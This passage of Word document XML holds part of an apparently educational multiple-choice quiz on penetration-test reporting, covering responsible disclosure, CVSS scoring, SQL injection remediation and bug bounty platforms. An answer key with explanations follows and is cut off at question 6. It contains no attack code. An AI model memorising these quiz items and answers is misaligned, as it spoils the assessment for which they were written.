      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Severity and CVE count</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Responsible disclosure means:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Publishing a vulnerability immediately on social media</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Privately reporting a vulnerability and giving the organisation time to fix it before public disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Never reporting vulnerabilities found outside scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Selling the vulnerability to the highest bidder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which certification is described as requiring candidates to compromise real lab machines in a rigorous, fully hands-on exam?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CompTIA Security+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CEH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> eJPT only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What should always accompany a CVSS base score in a professional report?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nothing else is needed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The vector string and reasoning for each metric choice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Only the tester's opinion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The client's budget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which remediation strategy directly addresses SQL Injection at the root cause?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parameterised queries (captured under input validation / secure coding)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Risk heat maps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bug bounty programmes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> HackerOne and Bugcrowd are examples of:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit development frameworks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bug bounty / vulnerability disclosure platforms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Password cracking tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network scanners</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why is it important to justify, not just state, a CVSS severity rating in a report?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is a formatting requirement with no real purpose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It lets the client's security team verify and trust the rating rather than accept a bare number</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVSS scores are randomly generated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Justification is only needed for Low severity findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer Key</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975"/>
        <w:gridCol w:w="975"/>
        <w:gridCol w:w="7796"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Q#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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The Executive Summary is explicitly a one-page, non-technical overview for management.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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AV:N/AC:L/PR:N/UI:N with High C/I/A impact scores in the Critical band (9.0-10.0).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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User Interaction: Required and partial (not full) C/I/A impact pull the XSS score down relative to the backdoor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Risk heat maps are built on likelihood versus impact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Responsible disclosure gives the affected party reasonable time to remediate before any public release.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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OSCP is well known for its demanding, fully practical exam format.</w:t>
            </w:r>
